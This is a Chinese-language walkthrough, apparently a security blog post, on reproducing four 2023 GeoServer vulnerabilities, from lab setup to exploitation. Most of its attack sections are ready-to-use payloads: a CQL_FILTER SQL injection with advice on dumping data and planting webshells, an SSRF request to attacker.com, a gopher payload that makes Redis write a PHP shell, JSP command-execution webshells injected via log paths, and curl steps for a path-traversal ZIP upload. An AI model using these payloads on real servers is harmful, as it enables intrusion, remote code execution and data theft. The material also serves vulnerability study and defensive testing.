GeoServer漏洞复现深度指南从环境搭建到实战利用1. 环境准备与基础配置在开始漏洞复现之前我们需要搭建一个完整的GeoServer测试环境。以下是详细的配置步骤1.1 GeoServer安装与启动首先从官网下载GeoServer 2.22.1版本该版本包含多个历史漏洞wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/geoserver-2.22.1-bin.zip unzip geoserver-2.22.1-bin.zip cd geoserver-2.22.1/bin sh startup.sh注意确保系统已安装Java 8或11环境可通过java -version验证1.2 PostGIS环境配置对于需要数据库交互的漏洞如CVE-2023-25157需配置PostgreSQLPostGISdocker pull postgres:14 docker run -e POSTGRES_PASSWORDpassword -p 5432:5432 -d postgres:14 docker exec -it [CONTAINER_ID] /bin/bash apt-get update apt-get install -y postgis postgresql-14-postgis-3 psql -U postgres -c CREATE EXTENSION postgis;1.3 必要扩展安装部分漏洞需要WPS等扩展支持下载WPS插件wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/extensions/geoserver-2.22.1-wps-plugin.zip将解压后的JAR文件复制到WEB-INF/lib目录重启GeoServer服务2. CVE-2023-25157SQL注入漏洞实战2.1 漏洞原理分析该漏洞存在于OGC Filter的解析过程中影响以下过滤器类型过滤器类型受影响函数PropertyIsLikestrStartsWith/strEndsWithFeatureIdjsonArrayContainsDWithin几何计算函数漏洞核心在于GeoServer未对用户输入的CQL_FILTER参数进行充分过滤导致恶意SQL语句被拼接执行。2.2 完整复现步骤创建测试图层工作区vuln_test数据存储PostGIS连接配置图层名称test_layer添加字符串类型属性name构造恶意请求GET /geoserver/wfs?servicewfsversion1.0.0requestGetFeature typeNamevuln_test:test_layer CQL_FILTERstrStartsWith(name,x)true AND 1(SELECT CAST((SELECT version()) AS integer))-- HTTP/1.1观察响应中的数据库报错信息包含PostgreSQL版本详情2.3 漏洞利用技巧信息收集通过修改SELECT语句可获取数据库用户、表结构等信息数据导出使用COPY TO命令导出敏感数据权限提升利用PostgreSQL大对象函数写入webshell提示实际渗透中需先通过SELECT postgis_version()确认扩展安装情况3. CVE-2023-43795SSRF漏洞深度利用3.1 WPS服务配置验证首先确认WPS扩展已正确安装访问/geoserver/web/管理界面左侧服务列表应显示WPS选项通过Demo WPS Request Builder测试基本功能3.2 SSRF漏洞利用链标准POCPOST /geoserver/wps HTTP/1.1 Host: target:8080 Content-Type: application/xml wps:Execute xmlns:wpshttp://www.opengis.net/wps/1.0.0 ows:IdentifierJTS:area/ows:Identifier wps:DataInputs wps:Input ows:Identifiergeom/ows:Identifier wps:Reference xlink:hrefhttp://attacker.com/ /wps:Input /wps:DataInputs /wps:Execute高级利用方式Redis未授权访问wps:Reference xlink:hrefgopher://redis:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0a%0a%3C%3Fphp%20system($_GET[%27cmd%27])%3B%20%3F%3E%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a/内网服务探测for port in {1..65535}; do curl -X POST --data poc.xml http://target/geoserver/wps \ --header Content-Type: application/xml \ --proxy http://127.0.0.1:$port done4. CVE-2023-41877从文件读取到RCE的完整链条4.1 漏洞触发条件需要满足两个前提拥有管理员权限账户服务以Tomcat容器部署Jetty不支持JSP解析4.2 分步利用过程修改全局日志路径进入全局设置 日志文件位置将路径改为/var/lib/tomcat9/webapps/geoserver/logs/shell.jsp通过错误日志注入JSP代码GET /geoserver/ows?servicewmsversion1.3.0 request%Runtime.getRuntime().exec(request.getParameter(cmd));% HTTP/1.1访问生成的webshellGET /geoserver/logs/shell.jsp?cmdid HTTP/1.14.3 针对Jetty的替代方案当服务使用Jetty时可通过XML部署描述文件实现RCE修改日志路径为/var/lib/jetty/webapps/geoserver/WEB-INF/web.xml注入恶意Servlet配置servlet servlet-nameCommand/servlet-name jsp-file% Runtime.getRuntime().exec(request.getParameter(cmd)) %/jsp-file /servlet5. CVE-2023-51444文件上传漏洞的曲折利用5.1 漏洞前置知识该漏洞涉及ImageMosaic数据源的三个关键特性允许通过REST API管理栅格数据支持ZIP文件自动解压路径校验逻辑存在缺陷5.2 完整复现流程准备恶意ZIP包mkdir -p WEB-INF/classes/ echo % Runtime.getRuntime().exec(request.getParameter(cmd)); % shell.jsp zip -r exploit.zip WEB-INF/ shell.jsp分步执行攻击# 步骤1创建存储 curl -u admin:geoserver -XPOST -H Content-type: text/xml \ -d coverageStorenameexploit/nameworkspacesf/workspace/coverageStore \ http://target/geoserver/rest/workspaces/sf/coveragestores # 步骤2上传ZIP curl -u admin:geoserver -XPUT -H Content-type: application/zip \ --data-binary exploit.zip \ http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/file.imagemosaic # 步骤3路径穿越 curl -u admin:geoserver -XPUT -H Content-type: text/xml \ -d coverageStoreurlfile:/var/lib/tomcat9/webapps/geoserver//url/coverageStore \ http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/external.imagemosaic5.3 实际渗透中的变通方法当标准POC失效时可尝试使用已有合法ImageMosaic的配置文件通过/etc/passwd等文件确定绝对路径结合其他漏洞获取路径信息在测试环境中发现通过修改url参数为file:data/../../webapps/geoserver/也可实现路径穿越